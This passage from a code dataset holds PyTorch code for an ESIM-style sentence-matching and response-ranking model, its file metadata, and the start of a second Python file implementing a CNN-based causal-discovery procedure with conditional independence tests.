s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\th1 = self.linear(s1.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\th2 = self.linear(s2.view(-1, inp_size)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\th2t = torch.transpose(h2, 1, 2)\n\t\t# b x hidden_size x LB\n\n\t\te = torch.bmm(h1, h2t)\n\n\t\te_alpha = torch.mul(e, mask1.unsqueeze(-1))\n\t\te_alpha = torch.exp(e_alpha - torch.max(e_alpha, dim=1)[0].unsqueeze(1))\n\t\te_alpha = torch.div(e_alpha, torch.sum(e_alpha, dim=1).unsqueeze(1))\n\t\t# b x LA x LB\n\n\t\te_beta = torch.mul(e, mask2.unsqueeze(1))\n\t\te_beta = torch.exp(e_beta - torch.max(e_beta, dim=2)[0].unsqueeze(-1))\n\t\te_beta = torch.div(e_beta, torch.sum(e_beta, dim=2).unsqueeze(-1))\n\t\t# b x LA x LB\n\n\t\talphas = torch.bmm(torch.transpose(e_alpha, 1, 2), s1)\n\t\talphas = torch.mul(alphas, mask2.unsqueeze(-1))\n\t\t# b x LB x inp_size\n\t\tbetas = torch.bmm(e_beta, s2)\n\t\tbetas = torch.mul(betas, mask1.unsqueeze(-1))\n\t\t# b x LA x inp_size\n\n\t\treturn alphas, betas\n\nclass CompareFeedForward(nn.Module):\n\t\"\"\"\n\tSimilar to the compare (Section 3.2) module of the DecAtt paper\n\texcept instead of returning the sum of the embeddings v1 and v2\n\t(which might be susceptible to the length of the sequence),\n\tthis returns v1_avg, v1_max, v2_avg, v2_max.\n\t\"\"\"\n\tdef __init__(self, inp_size, hidden_size=200):\n\t\tsuper(CompareFeedForward, self).__init__()\n\n\t\tself.linear = nn.Sequential( \\\n\t\t\tnn.Linear(inp_size * 2, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size))\n\n\tdef forward(self, s1, s2, alphas, betas, mask1, mask2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 BiLSTM embeddings (b x LA x inp_size)\n\t\t\ts2: Sentence 2 BiLSTM embeddings (b x LB x inp_size)\n\t\t\talphas: Aligned phrases (b x LB x inp_size)\n\t\t\tbetas: Aligned phrases (b x LA x inp_size)\n\t\t\tmask1: Sentence 1 mask (b x LA)\n\t\t\tmask2: Sentence 2 mask (b x LB)\n\t\tOutput:\n\t\t\tv1_avg: Comparison avg. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv1_max: Comparison max. pooled vector for aligned sentence s1 (b x hidden_size)\n\t\t\tv2_avg: Comparison avg. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\tv2_max: Comparison max. pooled vector for aligned sentence s2 (b x hidden_size)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\t\tinp_size = s1.shape[2]\n\n\t\tin1 = torch.cat((s1, betas), dim=2)\n\t\t# b x LA x (inp_size * 2)\n\t\tin2 = torch.cat((s2, alphas), dim=2)\n\t\t# b x LB x (inp_size * 2)\n\n\t\tv1 = self.linear(in1.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LA x hidden_size\n\t\tv1_avg = torch.sum(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)\n\t\tv1_avg = torch.div(v1_avg, torch.sum(mask1, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv1_max = torch.max(torch.mul(v1, mask1.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\tv2 = self.linear(in2.view(-1, inp_size * 2)).view(batch_size, maxlen, -1)\n\t\t# b x LB x hidden_size\n\t\tv2_avg = torch.sum(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)\n\t\tv2_avg = torch.div(v2_avg, torch.sum(mask2, dim=1).unsqueeze(-1))\n\t\t# b x hidden_size\n\t\tv2_max = torch.max(torch.mul(v2, mask2.unsqueeze(-1)), dim=1)[0]\n\t\t# b x hidden_size\n\n\t\treturn v1_avg, v1_max, v2_avg, v2_max\n\nclass ESIMBNMultiTask(nn.Module):\n\t\"\"\"\n\tModel architecture similar to the Enhanced Sequential Inference Model (ESIM)\n\tas described in https://arxiv.org/abs/1609.06038 without the Tree LSTM. This\n\tmodel also has BatchNorm layers for preventing overfitting instead of dropout\n\tlayers.\n\n\tThe BatchNorm order followed here is LIN -> ReLU -> BN even though the original\n\tpaper used BN before the non-linearity. Some online sources claim that BN after\n\tthe ReLU gives better results.\n\n\tThe model is designed for both Reddit response prediction task and Quora\n\tsemantic question matching task.\n\t\"\"\"\n\tdef __init__(self, hidden_size=200, glove_loader=None, pretrained_emb=True):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\thidden_size: Size of the intermediate linear layers\n\t\t\tglove_loader: GLoVe embedding loader\n\t\t\tpretrained_emb: Use pretrained embeddings\n\t\t\"\"\"\n\t\tsuper(ESIMBNMultiTask, self).__init__()\n\n\t\tif not pretrained_emb:\n\t\t\traise NotImplementedError('always loads pretrained embeddings')\n\n\t\tword_vectors = glove_loader.word_vectors\n\t\tword_vectors = np.vstack(word_vectors)\n\t\tvocab_size = word_vectors.shape[0]\n\t\tembed_size = word_vectors.shape[1]\n\n\t\tself.embedding = nn.Embedding(vocab_size, embed_size)\n\t\tself.embedding.load_state_dict({'weight': torch.Tensor(word_vectors)})\n\t\tself.encoder = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=1, bidirectional=True)\n\t\tself.attend = AttendFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\t\tself.compare = CompareFeedForward(inp_size=hidden_size * 2, hidden_size=hidden_size)\n\n\t\t# prediction layer for the Quora task\n\t\tself.sts_pred = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 4, hidden_size), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size), \\\n\t\t\tnn.Linear(hidden_size, 2))\n\n\t\t# tranformation layer for the response\n\t\tself.response_transform = nn.Sequential( \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.ReLU(), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2), \\\n\t\t\tnn.Linear(hidden_size * 2, hidden_size * 2), \\\n\t\t\tnn.BatchNorm1d(num_features=hidden_size * 2))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\t\"\"\"Initialize network weights using Xavier init (with bias 0.01)\"\"\"\n\t\tself.apply(ixvr)\n\n\tdef forward(self, s1, s2, len1, len2):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\ts1: Sentence 1 embeddings (b x LA)\n\t\t\ts2: Sentence 2 embeddings (b x LB)\n\t\t\tlen1: Sentence 1 length (b)\n\t\t\tlen2: Sentence 2 length (b)\n\t\t\"\"\"\n\t\tbatch_size = s1.shape[0]\n\t\tmaxlen = s1.shape[1]\n\n\t\ts1 = self.embedding(s1).transpose(0, 1)\n\t\ts1, _ = self.encoder(s1)\n\t\ts1 = torch.transpose(s1, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\ts2 = self.embedding(s2).transpose(0, 1)\n\t\ts2, _ = self.encoder(s2)\n\t\ts2 = torch.transpose(s2, 0, 1).contiguous()\n\t\t# b x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len1.unsqueeze(-1)\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len2.unsqueeze(-1)\n\n\t\tmask1 = mask1.float()\n\t\tmask2 = mask2.float()\n\n\t\talphas, betas = self.attend(s1, s2, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(s1, s2, alphas, betas, mask1, mask2)\n\t\tassert batch_size > 1\n\t\tout = self.sts_pred(torch.cat((v1_avg, v1_max, v2_avg, v2_max), dim=1))\n\n\t\treturn out\n\n\tdef rank_responses(self, q, resp, len_q, len_resp):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tq: Reddit question embeddings (b x LA)\n\t\t\tresp: Reddit response candidates embeddings (b x K x LB)\n\t\t\tlen_q: Length of the input question (b)\n\t\t\tlen_resp: Length of the response candidates (b x K)\n\t\t\"\"\"\n\n\t\tbatch_size = q.shape[0]\n\t\tmaxlen = q.shape[1]\n\t\tK = resp.shape[1]\n\n\t\tq = self.embedding(q).transpose(0, 1)\n\t\tq, _ = self.encoder(q)\n\t\tq = torch.transpose(q, 0, 1).contiguous()\n\t\t# b x LA x (hidden_size * 2)\n\t\tresp = self.embedding(resp).view(batch_size * K, maxlen, -1).transpose(0, 1)\n\t\tresp, _ = self.encoder(resp)\n\t\tresp = torch.transpose(resp, 0, 1).view(batch_size, K, maxlen, -1).contiguous()\n\t\t# b x K x LB x (hidden_size * 2)\n\n\t\tmask1 = torch.arange(0, maxlen).expand(batch_size, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask1 = mask1.cuda()\n\t\tmask1 = mask1 < len_q.unsqueeze(-1)\n\t\tmask1 = mask1.float()\n\t\t# b x LA\n\n\t\tmask2 = torch.arange(0, maxlen).expand(batch_size * K, maxlen)\n\t\tif torch.cuda.is_available():\n\t\t\tmask2 = mask2.cuda()\n\t\tmask2 = mask2 < len_resp.view(-1).unsqueeze(-1)\n\t\tmask2 = mask2.view(batch_size, K, -1).float()\n\t\t# b x K x LB\n\n\t\tq = q.unsqueeze(1).expand(-1, K, -1, -1).contiguous().view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LA x (hidden_size * 2)\n\t\tmask1 = mask1.unsqueeze(1).expand(-1, K, -1).contiguous().view(batch_size * K, maxlen)\n\t\t# (b * K) x LA\n\n\t\tresp = resp.view(batch_size * K, maxlen, -1)\n\t\t# (b * K) x LB x (hidden_size * 2)\n\t\tmask2 = mask2.view(batch_size * K, maxlen)\n\t\t# (b * K) x LB\n\n\t\talphas, betas = self.attend(q, resp, mask1, mask2)\n\t\tv1_avg, v1_max, v2_avg, v2_max = self.compare(q, resp, alphas, betas, mask1, mask2)\n\n\t\tv1 = torch.cat((v1_avg, v1_max), dim=1)\n\t\t# (b * K) x (hidden_size * 2)\n\t\tv2 = self.response_transform(torch.cat((v2_avg, v2_max), dim=1))\n\t\t# (b * K) x (hidden_size * 2)\n\n\t\tscores = torch.sum(torch.mul(v1, v2), dim=1).view(batch_size, -1)\n\t\t# b x K\n\n\t\treturn scores\n", "sub_path": "models/ESIMBNMultiTask.py", "file_name": "ESIMBNMultiTask.py", "file_ext": "py", "file_size_in_byte": 9601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.LSTM", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "utils.misc.ixvr", "line_number": 186, "usage_type": "argument"}, {"api_name": "torch.transpose", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 250, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "11376249", "text": "import random\nimport torch\nimport torch.nn as nn\nfrom torch import optim\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nimport time\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests import CMIknn, ParCorr\n\n\nimport itertools\nfrom joblib import Parallel, delayed\n\n# from ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha, window_size, align_pair\n# from ctmi_new import i_ctmi, ctmi\n# from gctmi import gctmi\n\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi import window_representation, get_sampling_rate, align_matrix, tmi, get_alpha\nfrom baselines.scripts_python.python_packages.pwNBCBk.ctmi_new import ctmi, align_matrix, tmi, gamma_matrix_window_matrix, get_alpha\n# from gctmi import gctmi\n\nfrom datetime import datetime\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n\nclass TestMI:\n def __init__(self, p_value= True):\n self.cd = CMIknn(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, knn=10, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n self.p_value = p_value\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n\n ws_xy = 1\n # y_past = y[:-ws_xy]\n # x = x[ws_xy:]#.reset_index(drop=True)\n # y = y[ws_xy:]#.reset_index(drop=True)\n\n if z is not None:\n # z = z[ws_xy:] # .reset_index(drop=True)\n # z = np.concatenate((z, y_past), axis=1)\n\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n # X = np.concatenate((x, y, y_past), axis=1)\n X = np.concatenate((x, y), axis=1)\n # xyz = np.array([0] * dim_x + [1] * dim_y + [2] * ws_xy)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n if self.p_value:\n pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n return pvalue, value\n else:\n return 0, value\n\n\nclass TestParCorr:\n def __init__(self):\n self.cd = ParCorr(mask_type=None, significance='shuffle_test', fixed_thres=None, sig_samples=10000,\n sig_blocklength=3, confidence='bootstrap', conf_lev=0.9, conf_samples=10000,\n conf_blocklength=1, verbosity=0)\n\n def fit(self, x, y, z=None):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n dim_x = x.shape[1]\n dim_y = y.shape[1]\n if z is not None:\n dim_z = z.shape[1]\n X = np.concatenate((x, y, z), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y+ [2] * dim_z)\n else:\n X = np.concatenate((x, y), axis=1)\n xyz = np.array([0] * dim_x + [1] * dim_y)\n value = self.cd.get_dependence_measure(X.T, xyz)\n # pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n pvalue = 0\n return pvalue, value\n\n\nclass tsCNN(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, 1)\n self.compact_in = nn.Linear(int(input_size/input_lag), 1)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=1,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n # self.conv2 = nn.Sequential(\n # nn.Conv1d(\n # in_channels=16,\n # out_channels=8,\n # kernel_size=5,\n # stride=1,\n # padding=2,\n # ),\n # nn.ReLU(),\n # nn.MaxPool1d(kernel_size=2),\n #\n # )\n # self.compact_out = nn.Linear(8, 1)\n # self.out_1 = nn.Linear(input_size*2*2, input_size*2)\n # self.out_2 = nn.Linear(input_size*2, input_size)\n self.out = nn.Linear(input_size, output_size)\n\n def forward(self, x_dict):\n # print(x.size())\n compact_ts_dict = dict()\n names = list(x_dict.keys())\n for name in names:\n x = x_dict[name].view(-1, self.input_lag)\n compact_ts_i = self.compact_ts(x)\n compact_ts_dict[name] = compact_ts_i\n if name == names[0]:\n compact_ts = compact_ts_i\n else:\n compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n compact_in = self.compact_in(compact_ts)\n x = compact_in.view(-1, 1, 1)\n x = self.conv1(x)\n # print(x.size())\n # x = self.conv2(x)\n # x = x.view(-1, self.input_size*2*2)\n x = x.view(-1, self.input_size)\n # compact_out = self.compact_out(x)\n # output = self.out(compact_out)\n # x = self.out_1(x)\n # x = self.out_2(x)\n output = self.out(x)\n return output, compact_in, compact_ts_dict\n\n\ndef train(input_dict, target_tensor, model, optimizer, criterion):\n\n optimizer.zero_grad()\n # model.zero_grad()\n\n output, _, _ = model(input_dict)\n loss = criterion(output, target_tensor)\n\n loss.backward()\n optimizer.step()\n return loss.item()\n\n\ndef predict(input_dict, model):\n output, compact_out, compact_ts_dict = model(input_dict)\n return output, compact_out, compact_ts_dict\n\n\n# Function to produce noise\ndef add_noise(x, d, order, beta=0.5):\n x = x.copy()\n rand = np.random.randint(0, high=d, size=x.shape[0])\n for j in range(d):\n proba = np.random.random(size=1)\n if proba > beta:\n for o in range(order-1):\n i = j + o*d\n x[i, rand[j]] = 0\n return x\n\n\ndef mts_order(mts, order=4):\n new_mts = pd.DataFrame()\n for i in range(order):\n if i == order:\n i_data = mts[i:]\n else:\n i_data = mts[i:(-order + i)]\n if isinstance(mts, pd.DataFrame):\n names_col = mts.columns.values+ \"_\" + str(i + 1)\n elif isinstance(mts, pd.Series):\n names_col = mts.name + \"_\" + str(i + 1)\n else:\n print('error!')\n exit(0)\n for j in range(len(names_col)):\n new_mts[names_col[j]] = i_data[mts.columns.values[j]].values\n return new_mts\n\n\ndef tskiko_mv(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n verbose=True):\n \"\"\"\n :param data: input\n :param max_lag: max_lag\n :param learning_rate: learning rate of the autoencoder\n :param training_epoch: number of training epochs\n :param num_neurons: number of neurones in the hidden layer\n :param noise: boolean value, if true a denoising autoencoder should be use\n :param alpha:\n :param cond_ind_test: CMI or ParCorr\n :param verbose:\n :return: dict\n \"\"\"\n # cond_ind_test = \"CMI\"\n option = 1\n # Start Causal ordering\n start = time.time()\n\n # scaler = MinMaxScaler(feature_range=(-1, 1))\n # data = pd.DataFrame(scaler.fit_transform(data.values), columns=data.columns)\n # data.columns = data.columns.values.astype(str)\n d = data.shape[1]\n\n x = mts_order(data, order=max_lag) # [:-order]\n names_x = x.columns[:-d]\n # names_x = x.columns\n names_y = x.columns[-d:]\n y = x[names_y]\n x = x[names_x]\n\n summary_names = list(data.columns)\n temporal_names = dict()\n for s in range(d):\n temporal_names[summary_names[s]] = []\n for o in range(max_lag - 1):\n i = s + o * d\n temporal_names[summary_names[s]].append(names_x[i])\n\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n # todo compare each time series with its past\n for j in range(d-1):\n # if j != 0:\n # x_train.drop(temporal_names[selected], axis=1, inplace=True)\n # y.drop(y.columns[selected_loc], axis=1, inplace=True)\n # del S[selected_loc]\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag-1).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n # mini_batch_size = 5\n # N = x_train.shape[0] - 2\n # n_batch = N // mini_batch_size + (N % mini_batch_size != 0)\n # i_batch = (iter % N)\n if noise:\n x_train_n = add_noise(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag-1))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag-1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(\n # x_train_n.reshape(-1, x_train_n.shape[1], 1), dtype=torch.float,\n # device=device)\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n # k = d - 1 - j\n test_indep_values = []\n indep_values = []\n c = x_train.copy()\n input_dict = dict()\n for i in range(int(c.shape[1] / (max_lag - 1))):\n input_tensor = torch.tensor(\n c[temporal_names[S[i]]].values.reshape(-1, max_lag - 1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(c.values.reshape(c.shape[0], c.shape[1], 1), dtype=torch.float, device=device)\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n for s in range(len(S)):\n # for o in range(order-1):\n # i = s + o*len(S)\n # c[:, i] = np.zeros((x_train.shape[0]))\n e = y.values[:, s] - res[:, s]\n # hs = TestHSIC(kernel='rbf')\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n # pval, val = hs.fit(compact_res, e, c[temporal_names[S[s]]])\n cond = compact_ts_dict[S[s]].detach().numpy()\n pval, val = hs.fit(compact_res, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n test_indep_array = 